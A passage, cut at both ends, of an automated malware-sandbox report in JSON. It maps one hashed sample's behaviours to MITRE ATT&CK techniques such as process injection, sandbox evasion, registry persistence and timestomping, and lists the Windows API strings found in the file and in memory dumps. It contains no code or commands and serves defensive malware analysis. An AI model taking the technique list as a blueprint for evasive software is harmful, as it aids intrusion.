"attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005304.00000000.173100.00534000.00000004.mdmp\")\n Found reference to API \"2005303345,5960,3140,,CreateProcessW,kernel32.dll,\"252:30:30.383\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005304.00000000.173100.00620000.00000004.mdmp\")\n Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; Source: \"00000000-00006044.00000001.175400.00534000.00000004.mdmp\")\n Found reference to API \"CreateProcessW\" (Indicator: \"CreateProcess\"; Source: \"00000000-00006104.00000000.173155.00534000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteW\" (Indicator: \"ShellExecute\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"GetTokenInformation\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegCreateKeyExW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegDeleteValueW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateWellKnownSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"OpenProcessToken\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegSetValueExW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FreeSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegFlushKey\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"AllocateAndInitializeSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CheckTokenMembership\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"EqualSid\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"Process32First\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"IsDBCSLeadByteEx\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TlsAlloc\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ReleaseSemaphore\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetVolumeInformationW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TlsGetValue\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"lstrlenW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"DeleteFileW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TlsFree\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateMutexA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateSemaphoreA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"LoadLibraryW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"MoveFileExW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FindNextFileW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetTempPathW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"FindFirstFileW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"VirtualQuery\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API (Indicator: \"CreateProcessW\"; File: \"37b29193bc5271ab066ce6bbaf110ce08ec5ba81e2c167a11f109f75625ba2c5\")\n Found reference to API 